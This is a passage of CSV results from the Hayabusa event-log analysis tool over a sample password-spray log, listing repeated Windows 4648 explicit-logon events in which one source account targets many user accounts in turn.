DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:42.669 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:43.731 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:44.801 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:45.880 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:46.969 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:48.042 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:49.108 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:50.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:51.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:52.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:53.366 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:54.441 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:55.503 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:56.579 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:57.650 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:58.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:59.800 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:00.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:01.934 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:02.995 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:04.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:05.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:06.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:07.308 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:08.370 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:09.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:10.523 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:11.590 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:12.649 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:13.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:14.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:15.846 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:16.940 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:18.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:19.076 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:20.162 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:21.257 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:22.327 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:23.410 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:24.477 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:25.557 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:26.628 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:27.690 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:28.763 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:29.837 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:30.921 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:31.996 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:33.058 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:34.138 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:35.199 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:36.266 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:37.375 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:38.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:39.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:40.560 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:41.637 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:42.734 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:43.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:44.875 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:45.951 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:47.017 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:48.096 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:49.176 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:50.264 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:51.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:52.405 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:53.466 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:54.572 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:55.671 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:56.741 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:57.817 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:58.894 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:29:59.965 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:01.026 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:02.115 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:03.191 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:04.272 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:05.348 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:06.426 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:07.478 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:08.564 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:09.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:10.717 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:11.809 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:12.857 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:13.904 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:14.972 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target 